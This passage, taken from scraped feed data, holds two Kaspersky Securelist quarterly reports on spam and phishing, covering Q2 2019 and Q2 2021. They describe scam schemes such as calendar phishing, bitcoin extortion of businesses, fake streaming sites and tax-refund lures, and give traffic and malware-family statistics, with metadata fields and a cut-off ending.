Most often, such links point to text files, tables, presentations, and other documents containing text and a link, say, to an advertised product or phishing page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/09/11085513/spam-report-q2-2019-1.png>)\n\nAlso this past quarter, cybercriminals actively used Google Calendar to send out invitations to non-existent meetings, adding phishing links to fields filled out by the organizer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/09/11085541/spam-report-q2-2019-2.png>)\n\nThrough Google Photos, fraudsters shared photos accompanied by a comment containing information about a money transfer and a contact email address. It's a traditional scheme: before receiving the promised money, the victim is asked to pay some kind of \"service fee\", whereupon the attackers vanish into thin air.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/09/11085606/spam-report-q2-2019-3.png>)\n\nGoogle Forms, a tool for creating forms and surveys, was also actively used by cybercriminals to harvest users' personal data and send commercial spam.\n\n### Bitcoin ransomware targets businesses\n\nUntil recently, the main blackmailing tool of cryptocurrency-hungry scammers was [sextortion](<https://www.kaspersky.com/blog/cia-sextortion/27146/>). However, their attention gradually began to switch from individual users to companies, which began to receive threats of [reputational harm to their website](<https://www.kaspersky.com/blog/spam-extortion-reputation/27362/>).\n\nOnce more, it's very straightforward. A request for the transfer of 0.3\u20130.5 bitcoin (around $4,200) is sent to the company's public email addresses (or via its online feedback form). 
In case of refusal, the cybercriminals threaten to send abusive messages supposedly from the victim company through the contact forms of 13 million websites, as well as to mail out aggressive spam in the company's name to 9 million email addresses. After that, they claim that the Spamhaus Project will recognize the victim's website as a source of spam and block it forever.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/09/11085634/spam-report-q2-2019-4.png>)\n\n### Global sporting events\n\nMajor sporting events attract not only millions of fans, but also numerous scammers looking to exploit them. As such, in Q2 we detected a spam mailing timed to coincide with the 2019 UEFA Europa League Final in Baku. Recipients were asked to guess the winner of the match and earn the chance to win up to \u00a3200,000.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084234/spam-report-q2-2019-6.png>)\n\nFor this, they had to follow the link in the message, provide some personal data, and predict which team would win. The information collected could then be used for fraudulent attacks and more spam mailings. There's also an extended version of this scheme: after some time, the victim receives a notification that their prediction was correct and their winnings are ready for collection \u2014 for which a small fee is required, naturally.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084244/spam-report-q2-2019-7.png>)\n\nBut scammers did not limit themselves to soccer fans. 
Q2 saw equally stellar golf and hockey tournaments in the shape of the Stanley Cup and the US Open.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084315/spam-report-q2-2019-8.png>)\n\nUsers were invited to watch broadcasts of these events, which, soon after starting, were blocked by a window prompting to set up an account:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084341/spam-report-q2-2019-9.png>)\n\nOn clicking the Create My Account button, a page opens asking to provide an email address and create a password:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084418/spam-report-q2-2019-10.png>)\n\nHowever, on filling out all the fields and clicking the Continue button, the victim is required to verify the account, for which some more personal information is required \u2014 namely, bank card details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084457/spam-report-q2-2019-11.png>)\n\nThe fraudsters report that the money will not be debited from the card, rather the payment data is needed simply for verification, since customers should supposedly be located in a country where the website is licensed to distribute such content. But even if you decide to undergo this \"verification,\" you won't see the end of the match, of course. Instead, your data and payment information will be in the hands of the scammers.\n\n### Global TV and movie premieres\n\nAs we already wrote several times in past reports, fraudsters keep a close eye on world events and adapt their schemes to them. We found a ruse similar to the previous one, aimed at fans of the Marvel Cinematic Universe ahead of the release of the latest _Avengers_ installment:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084526/spam-report-q2-2019-12.png>)\n\nBut Q2 wasn't all about _Avengers_. 
It also witnessed the long-awaited premiere of the last season of _Game of Thrones_, and our statistics showed that the following week the number of scam resources mentioning the series increased fourfold against the month before the release. One of the most common fraudulent schemes was simulating the generation of codes for _Game Of Thrones Conquest_, a spin-off mobile game.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084549/spam-report-q2-2019-13.png>)\n\nTo get a code, the user had to fill out a form, specifying the number of coins that they would like to receive in the game.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084621/spam-report-q2-2019-14.png>)\n\nAfter completing all the fields, the system goes into \"code generation\" mode. For the sake of authenticity, on-screen messages appear about connecting to servers and the like.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084648/spam-report-q2-2019-15.png>)\n\nThe generated code is not shown to the user until non-robot status is confirmed. This requires clicking a link and completing some kind of task.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084716/spam-report-q2-2019-16.png>)\n\nAt this point, the user might be asked to take a survey, play a lottery, provide details (phone number, postal address), subscribe to a paid SMS service, install adware (which redirects all user searches, harvests information about online activity, and resists deletion), or do something else. The nature of the task is determined by the partner network, one of whose sites the user is redirected to. 
The network, for its part, is selected based on the country of residence: it should match the regional language and local advertising laws.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084744/spam-report-q2-2019-17.png>)\n\nThe upshot is unpleasant, but predictable: the victim is either led around various partner sites until they tire of filling out forms and playing lotteries, or they are rewarded with a random set of symbols that has nothing to do with a genuine code and only mimics the format.\n\n### Tax refunds\n\nThe second quarter of the year sees the deadline for filing tax returns and tax refund applications in many countries. This is utilized by scammers who capitalize on users' carelessness and fear of missing the deadline. Phishing emails are sent out saying that the user is entitled to a tax refund (large enough to arouse interest). The reason given for the rebate might be a standard law procedure or a system error.\n\nSome mailings employ a well-known technique whereby the user is given a limited amount of time to take action. For instance, in an email seemingly from HMRC (Her Majesty's Revenue and Customs, the UK tax service), victims had to follow the link and fill out the form immediately, while fake CRA (Canada Revenue Agency) letters were giving the recipient 24 hours, otherwise a tax refund would not be possible.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084802/spam-report-q2-2019-18.png>)\n\nPhishing pages at the end of links in such messages are aimed at stealing various personal information: account passwords, answers to secret questions, names of close relatives, their dates of birth, full information about bank cards, including CVV code, and much more. 
In some examples, on clicking a link, a chain of actions had to be completed, such as entering basic information (name, social security number), followed by more detailed data, and then at the final step specifying bank card numbers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084836/spam-report-q2-2019-19.png>)\n\nBesides phishing links, scammers also sent malicious attachments. Cybercriminals tried to convince users to open them by citing errors in the return form that were in need of urgent correction. The malicious file, detected as Trojan-Downloader.MSOffice.SLoad.gen, was disguised as a copy of the return form. If the user gave permission to run the macro, another malicious executable was downloaded and launched.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084903/spam-report-q2-2019-20.png>)\n\nAnother bulk email attachment was detected as Trojan.Win32.Agentb.jofi, a multifunctional backdoor that provides remote access to the infected machine. Its capabilities include monitoring keystrokes, stealing passwords for browsers and Windows accounts, recording video from the computer's webcam, and executing commands received from C&C servers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084933/spam-report-q2-2019-21.png>)\n\n### Tourist phishing\n\nIn anticipation of the summer holidays, we registered an increase in the number of phishing mailings [aimed at travelers](<https://www.kaspersky.com/blog/travel-phishing/27078/>). Everything was in play: Airbnb emails with accommodation offers at tempting prices, phishing sites mimicking Booking.com, fake travel sites, and so on.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27084956/spam-report-q2-2019-22.png>)\n\nNeither did attackers ignore airlines \u2014 both large international carriers and small local firms. 
For example, here's a mailing we detected informing customers that their account has exceeded some kind of limit and requesting confirmation of account data within 24 hours.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27085016/spam-report-q2-2019-23.png>)\n\nThose who swallowed the bait and clicked the link were redirected to a fake site where they were prompted to fill out an \"authorization\" form. The data, of course, went straight to the attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27085038/spam-report-q2-2019-24.png>)\n\nMessages in another scam mailing scheme looked like official ticket booking confirmations. The fraudsters used the same phishing link for the booking number and the \"view details\" option. However, instead of the promised data, the user was taken to a page specially set up to steal personal information.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27085112/spam-report-q2-2019-25.png>)\n\n### Phishing emails supposedly from email services\n\nThe vast majority of scam emails aimed at stealing login credentials for email services imitate messages from the email services themselves. Scammers try to make their fake messages as believable as possible: the sender's address is similar to the real one, the message uses the correct logos, and there are links to official resources as well as signatures.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27085128/spam-report-q2-2019-26.png>)\n\nThe email text, the scammers also try to make convincing. It usually starts by reporting some kind of problem with the victim's account, followed by a description of what needs to be done, which entails either following a link or opening an attachment. 
To intimidate the recipient further, mention is made of what can happen to the account in case of failure to perform the specified actions (deletion, suspension), with specific time frames.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27085144/spam-report-q2-2019-27.png>)\n\nAtypical examples are also encountered: the message might be disguised as business correspondence (usually such messages contain a malicious attachment), and the text may not mention email accounts at all. On clicking the link in such an email, the user is taken to a page where they are asked to enter email account details in order to view a (nonexistent) document.\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q1 2019 \u2013 Q2 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27092903/en-spam-internet.png>)\n\nIn Q2 2019, the largest share of spam was recorded in May (58.71%). The average percentage of spam in global mail traffic was 57.64%, up 1.67 p.p. against the previous reporting period.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q2 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27092954/en-countries-spam.png>)\n\nThe top lines in the list of spam sources remain the same: in first place was China (23.72%), the US came second (13.89%), Russia remained third (4.83%), and Brazil took fourth (4.62%) \u2014 only the fifth line differs from last quarter: France (3.11%) pushed Germany out of the Top 5.\n\n### Spam email size\n\n_Spam email size, Q1 and Q2 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27093021/spam-size.png>)\n\nIn Q2 2019, the share of very small emails (up to 2 KB) in spam rose against Q1 by 13.33 p.p. to 87.31%. Meanwhile, the share of 5\u201310 KB messages fell by 4.52 p.p. to 2.27%. 
Messages 10\u201320 KB in size were less common than most other size categories: their share was 1.98%, down 3.13 p.p. on last quarter. The proportion of 20\u201350 KB messages amounted to 2.10%, versus 3% in the previous reporting period.\n\n### Malicious attachments, malware families\n\n_Number of Mail Anti-Virus triggerings, Q1 2019 \u2013 Q2 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27093045/en-spam-antivir.png>)\n\nIn Q2 2019, our security solutions detected a total of 43,907,840 malicious email attachments. May was the quarter's hottest month with almost 16 million mail antivirus triggers, while April was the coolest (2 million fewer).\n\n_Top 10 malicious attachments in mail traffic, Q2 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27093114/top10-mail.png>)\n\nIn Q2, the malware Exploit.MSOffice.CVE-2017-11882.gen (7.53%) came first in terms of prevalence in mail traffic. In second position was Worm.Win32.WBVB.vam (4.24%), and Trojan.MSOffice.SAgent.gen (2.32%) took third.\n\n_Top 10 malware families in mail traffic, Q2 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27093143/top10-mail-2.png>)\n\nLooking at malware families, we see a slightly different picture. In first place is the [Andromeda bot family](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Androm/>) (8.00%), whose individual members took only fourth and sixth places in the malware Top 10. Close behind is the Exploit.MSOffice.CVE-2017-11882 family (7.64%), a set of exploits for the Microsoft Office suite. 
In third place is the [Worm.Win32.WBVB](<https://threats.kaspersky.com/en/threat/Worm.Win32.WBVB/>) family of worms (4.74%), written in Visual Basic.\n\nCountries targeted by malicious mailshots\n\n_Countries targeted by malicious mailshots, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27093212/en-countries-targets.png>)\n\nGermany continues to occupy top spot by share of mail antivirus triggerings, posting 10.05% this quarter. Russia finished second (6.16%), nudging Vietnam (5.98%) into third.\n\n## Statistics: phishing\n\nIn Q2 2019, the Anti-Phishing system blocked **129,933,555** attempts to direct users to scam websites. **12.34%** of all Kaspersky Lab users worldwide experienced an attack.\n\n### Attack geography\n\nThe country with the largest share of users attacked by phishers in Q2 2019 was Greece (26.20%), up from sixth place the quarter before, having added 10.34 p.p.\n\n_Geography of phishing attacks, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27093240/en-map-phishing.png>)\n\nGreece is followed by Venezuela (25.67%), which rose to second from fifth, adding 8.95 p.p. Brazil came in third (20.86%), falling from first place, despite losing less than 1 p.p. Australia (17.73%) failed to medal this time around, while Portugal (17.47%) rounds off the Top 5.\n\n**Country** | ** %*** \n---|--- \nGreece | 26.20% \nVenezuela | 25.67% \nBrazil | 20.86% \nAustralia | 17.73% \nPortugal | 17.47% \nSpain | 15.85% \nAlgeria | 15.51% \nChile | 15.47% \nFrance | 14.81% \n \n_* Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country_\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. 
It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThis quarter, credit organizations retain first place by number of attacks \u2014 the share of attacks on banks amounted to 30.68%, which is almost 5 p.p. more than last quarter.\n\n_Distribution of organizations subjected to phishing attacks by category, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/27093305/en-organizations.png>)\n\nIn second position were payment systems (20.12%), and global Internet portals (18.02%) took third place.\n\n## Conclusion\n\nIn Q2 2019, the average share of spam in global mail traffic fell by **1.67 p.p.** to **57.64%**, while the Anti-Phishing system prevented more than **130 million** redirects to phishing sites, up **18 million** on the previous reporting period.\n\nFirst place in the list of spam sources went to **China** with a share of **23.72%**. Top spot by number of mail antivirus detections was claimed by **Germany** on **10.05%**. Throughout Q2 2019, our security solutions detected a total of **43,907,840** malicious email attachments. The most prevalent malware in mail traffic was **Exploit.MSOffice.CVE-2017-11882.gen** with a share of **7.53%**, while **Backdoor.Win32.Androm**, with an **8%** share, was the most common malicious family.\n\nCybercriminals continue to look for new ways to deliver spam and improve old ones. In Q2, they used popular Google services to distribute spam. Blackmailers are also trying out new methods. 
Alongside threats to ordinary users, attempts were made to blackmail companies by threatening to send spam mailings in their name.\n\nApart from that, as before, scammers are alive to the zeitgeist and quickly adapt their schemes to high-profile events.", "cvss3": {}, "published": "2019-08-28T10:00:28", "type": "securelist", "title": "Spam and phishing in Q2 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-08-28T10:00:28", "id": "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "href": "https://securelist.com/spam-and-phishing-in-q2-2019/92379/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-05T12:36:39", "description": "\n\n## Quarterly highlights\n\n### The corporate sector\n\nIn Q2 2021, corporate accounts continued to be one of the most tempting targets for cybercriminals. To add to the credibility of links in emails, scammers imitated mailings from popular cloud services. This technique has been used many times before. A fake notification about a Microsoft Teams meeting or a request to view an important document traditionally takes the victim to a phishing login page asking for corporate account credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142238/Spam_and_phishing_in_Q2_2021_01.png>)\n\nCybercriminals also faked emails from cloud services in schemes aimed at stealing not accounts but money. We saw, for example, spoofed messages about a comment added to a document stored in the cloud. The document itself most likely did not exist: at the other end of the link was the usual recipe for making a fast buck online by investing in Bitcoin or a similarly tempting offer. 
Such "offers" usually require the victim to pay a small amount upfront to claim their non-existent reward.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142307/Spam_and_phishing_in_Q2_2021_02.png>)\n\nIn addition to various cloud-related emails, we blocked messages disguised as business correspondence and containing links to malware. In particular, an email threatening legal action claimed that the victim had not paid for a completed order. To resolve the issue amicably, the recipient was asked to review the documents confirming the order completion and to settle the bill by a certain date. The documents were supposedly available via the link provided and protected by a special code. In fact, the file named "\u0414\u043e\u0433\u043e\u0432\u043e\u0440 \u21168883987726 \u043e\u0442 10.10.2021.pdf.exe" (Agreement #8883987726 of 10.10.2021.pdf.exe) that the victim was asked to download was a malicious program known as Backdoor.Win32.RWS.a.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142335/Spam_and_phishing_in_Q2_2021_03.png>)\n\n### COVID-19 compensation fraud\n\nIn Q2 2021, scammers continued to exploit the theme of pandemic-related compensation. This time, offers of financial assistance were mostly sent in the name of government agencies. "The UK Government" and "the US Department of the Treasury" were ready to pay out special grants to all-comers. However, attempts to claim the promised handout only led to monetary loss or compromised bank card details. It goes without saying that the grants did not materialize.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142357/Spam_and_phishing_in_Q2_2021_04.png>)\n\nIt was bank card details, including CVV codes, that were the target of a gang of cybercriminals who created a fake informational website about social assistance for citizens of Belarus. 
To make the pages look official, the scammers described in detail the system of payouts depending on the applicant's line of work and other conditions. The information bulletin issued in the name of the Belarus Ministry of Health clearly spelled out the payment amounts for medical staff. Workers in other fields were invited to calculate their entitled payout by clicking the Get Social Assistance button. This redirected the visitor to a page with a form for entering bank card details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142425/Spam_and_phishing_in_Q2_2021_05.png>)\n\n### Parcel scam: buy one, get none\n\nUnexpected parcels requiring payment by the recipient remained one of the most common tricks this past quarter. Moreover, cybercriminals became more adept at localizing their notifications: Q2 saw a surge in mass mailings in a range of languages. The reason for the invoice from the "mail company" could be anything from customs duties to shipment costs. When trying to pay for the service, as with compensation fraud, victims were taken to a fake website, where they risked not only losing the amount itself (which could be far higher than specified in the email), but also spilling their bank card details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142509/Spam_and_phishing_in_Q2_2021_06.png>)\n\nMailed items were the focus of one other fraudulent scheme. Websites appeared offering people the chance to buy out others' parcels that for some reason could not reach the intended recipients. The "service" was positioned as a lottery \u2014 the buyer paid only for the weight of the parcel (the bigger it was, the higher the price), and its contents were not disclosed. To find out what was inside, the lucky owner of the abandoned parcel had to wait for it to arrive at the specified address. Which it didn't. 
According to the mail company Russian Post, when the storage period expires, registered items (parcels, letters, postcards, EMS items) are sent to the return address at the sender's expense. If the sender does not collect the returned item within the storage period, it is considered "unclaimed" and stored for a further six months, after which it is destroyed. In other words, ownerless parcels are not sold. Therefore, any offer to buy them is evidently a scam.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142815/Spam_and_phishing_in_Q2_2021_07.png>)\n\n### New movies: pay for the pleasure of not watching\n\nLate April saw the annual Oscars ceremony in Hollywood. Movies nominated for an Academy award naturally attract public as well as cybercriminal attention. As a consequence, fake websites popped up offering free viewings and even downloads of Oscar contenders. After launching a video, the visitor of the illegal movie theater was shown several clips of the film (usually taken from the official trailer), before being asked to pay a small subscription fee to continue watching. However, after payment of the "subscription" the movie screening did not resume; instead the attackers had a new bank account to play with.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142842/Spam_and_phishing_in_Q2_2021_08.png>)\n\nIn fact, almost any big-budget movie is accompanied by the appearance of fake websites offering video or audio content long before its official release. Kaspersky found fake sites supposedly hosting _Friends: The Reunion_, a special episode of the popular sitcom. Fans who tried to watch or download the long-awaited continuation were redirected to a Columbia Pictures splash screen. 
After a few seconds, the broadcast stopped, replaced by a request to pay a nominal fee.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142917/Spam_and_phishing_in_Q2_2021_09.png>)\n\n### Messenger spam: WhatsApp with that?\n\nIn messenger-based spam, we continued to observe common tricks to get users to part with a small amount of money. Victims were asked, for example, to take a short survey about WhatsApp and to send messages to several contacts in order to receive a prize. Another traditional scam aims to persuade the user that they are the lucky winner of a tidy sum. Both scenarios end the same way: the scammers promise a large payout, but only after receiving a small commission.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143055/Spam_and_phishing_in_Q2_2021_10.png>)\n\nWhatsApp was bought by Facebook in 2014. In early 2021, the two companies' symbiotic relationship became a hot topic in connection with [WhatsApp's new privacy policy](<https://www.wired.com/story/whatsapp-facebook-data-share-notification/>), allowing the messenger to exchange user information with its parent company. Cybercriminals took advantage of the rumor mill about the two companies. They set up fake websites inviting users to a WhatsApp chat with "beautiful strangers". But when attempting to enter the chat room, the potential victim landed on a fake Facebook login page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143123/Spam_and_phishing_in_Q2_2021_11.png>)\n\nEmails with a link pointing to a fake WhatsApp voice message most likely belong to the same category. 
By following it, the recipient risks not only handing over their personal data to the attackers, but also downloading malware to their computer or phone.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143142/Spam_and_phishing_in_Q2_2021_12.png>)\n\n### Investments and public property scams\n\nOffers of quick earnings with minimal effort remain one of the most common types of fraud. In Q2 2021, cybercriminals diversified their easy-money schemes. Email recipients were invited to invest in natural resources (oil, gas, etc.) or cryptocurrency secured by these resources. The topic of gas surfaced also in more conventional compensation scams. To make their offers more credible, cybercriminals used the brands of large companies. Having accepted investments, the scammers and their sites quickly disappeared along with the victims' money.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143159/Spam_and_phishing_in_Q2_2021_13.png>)\n\nFor more suspicious minds, the cybercriminals set up a fake Gazprom anti-fraud website, where they posed as company employees, promising to compensate victims' losses. The cybercriminals claimed that those who had paid more than 60,000 rubles were entitled to compensation; however, the attacks were not targeted. Most likely, the scammers were counting on users being curious about whether they could claim compensation. Naturally, the help of the "anti-fraudsters" was not without strings attached, despite the advertised free consultation. "Clients" who filled out the form were asked to pay a small fee for the refund, whereupon the "consultants" vanished without compensating so much as a dime.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143221/Spam_and_phishing_in_Q2_2021_14.png>)\n\nAnother high-earning scam cited client payouts under VTB Invest, VTB Bank's digital asset management solution. 
Using the bank's logos, the fraudsters offered "active banking users" the opportunity to receive "payout from investors." After filling out the application form, indicating name, phone number and email, the potential victim saw a message stating that they are to receive a certain amount of money. Although the cybercriminals assured that no commission was payable, to receive the "payout" the applicant was required to provide bank card details or deposit a small sum, ostensibly to verify the account. In other words, it was the usual scheme in a different wrapper.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143316/Spam_and_phishing_in_Q2_2021_15.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\nAfter a prolonged decline, the share of spam in global mail traffic began to grow again in Q2 2021, averaging 46.56%, up 0.89 p.p. against the previous reporting period.\n\n_Share of spam in global mail traffic, Q1 and Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144632/01-en-spam-report-q2-2021.png>))_\n\nA look at the data by month shows that, having troughed in March (45.10%), the share of spam in global mail traffic rose slightly in April (45.29%), with further jumps in May (46.35%) and June (48.03%), which is comparable to Q4 2020.\n\n### Source of spam by country\n\nThe TOP 10 spam-source countries remained virtually unchanged from the first quarter. Russia (26.07%) is still in first place, its share having increased by 3.6 p.p., followed by Germany (13.97%) and the US (11.24%), whose contribution to the global flow of spam decreased slightly. 
China (7.78%) remains in fourth position.\n\n_Source of spam by country, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144703/03-en-spam-report-q2-2021.png>))_\n\nThe Netherlands (4.52%), France (3.48%) and Spain (2.98%) held on to fifth, sixth and seventh, respectively. Only the last three positions in the TOP 10 experienced a slight reshuffle: Poland (1.69%) dropped out of the ranking, falling to 11th place, while Japan (2.53%) moved up to eighth. Brazil (2.27%) remained in ninth spot, while the last line in the ranking was claimed by India (1.70%).\n\n### Malicious mail attachments\n\nMail Anti-Virus blocked 34,224,215 malicious attachments in Q2, almost 4 million fewer than in the first three months of 2021.\n\n_Number of Mail Anti-Virus triggerings, Q1 and Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144738/04-en-spam-report-q2-2021.png>))_\n\nPeak malicious activity came in June, when Kaspersky solutions blocked more than 12 million attachments, while May was the quietest with only 10.4 million.\n\n#### Malware families\n\nIn Q2, Trojans from the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family (7.09%) were the most common malicious attachments in spam, their share having increased by 1.3 p.p. These malicious programs, disguised as electronic documents, are often distributed in archives. In contrast, [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojans (6.65%), which specialize in stealing credentials, shed 2.26 p.p. and dropped to second place. The [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family (4.25%), which exploits Windows Task Scheduler, rounds out the TOP 3. 
These Trojans, like Badun, are gaining popularity.\n\n_TOP 10 malware families in mail traffic, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144835/05-en-spam-report-q2-2021.png>))_\n\nExploits for [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (4.07%), an Equation Editor vulnerability popular with cybercriminals, gave ground and dropped to fourth place. Next come malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (3.29%). Sixth and eighth places were occupied by Noon spyware Trojans, which infect [any](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) (2.66%) or [only 32-bit](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (2.47%) versions of Windows. [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (2.55%) lie in seventh position, while the TOP 10 is rounded out by malicious documents in the [SAgent](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>) (2.42%) and [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) (2.11%) families.\n\n_TOP 10 malicious attachments, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144904/06-en-spam-report-q2-2021.png>))_\n\nThe TOP 10 attachments in spam differs only slightly from the ranking of malware families. 
The most widespread representative of the Agent family fell short of the TOP 10, but the ranking did find room for a Trojan from the [Crypt](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Crypt/>) family (2.06%), which includes heavily [obfuscated](<https://encyclopedia.kaspersky.com/glossary/obfuscation/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and encrypted programs.\n\n### Countries targeted by malicious mailings\n\nMore than anywhere else, Kaspersky solutions blocked malicious attachments on user devices in Spain (9.28%). The share of this country grew slightly against Q1 2021, adding 0.54 p.p. Second place was retained by Italy (6.38%), despite losing 1.21 p.p. Germany (5.26%) and Russia (5.82%) swapped places in Q2, while the UAE (5.36%) remained fourth, its share practically unchanged.\n\n_Countries targeted by malicious spam, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144933/07-en-spam-report-q2-2021.png>))_\n\nFurther down in the Top 10 countries by number of users who came across malicious attachments in Q2 2021 are Vietnam (4.71%), Mexico (4.23%), Turkey (3.43%), Brazil (2.91%) and Malaysia (2.53%).\n\n## Statistics: phishing\n\nIn phishing terms, Q2 2021 was fairly uneventful. The Anti-Phishing system detected and blocked 50,398,193 attempted redirects, with only 3.87% of our users encountering such phishing links.\n\n### Geography of phishing attacks\n\nLooking at the share of users by country on whose devices the Anti-Phishing system was triggered, we see that Brazil (6.67%), which lost first place last quarter, is back at the top. 
It did not pull far ahead of Israel (6.55%) and France (6.46%), which topped the Q1 list.\n\n_Geography of phishing attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03145007/08-en-spam-report-q2-2021.png>))_\n\n### Top-level domains\n\nThe traditional leader among top-level domain zones used by cybercriminals to post phishing pages is COM (31.67%). The ORG domain (8.79%) moved up to second place, pushing XYZ (8.51%) into third.\n\n_Top-level domain zones most commonly used for phishing, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03145039/09-en-spam-report-q2-2021.png>))_\n\nThe fourth most popular domain zone among cybercriminals in Q2 was China's CN (3.77%), followed by NET (3.53%). Russia's RU (2.98%) dropped to sixth place, and Tokelau's TK (1.65%) to eighth. Note also the cybercriminals' preference for international domain zones (six of the ten lines in this quarter's ranking).\n\n### Organizations under attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nFor the first time since the start of the pandemic, online stores 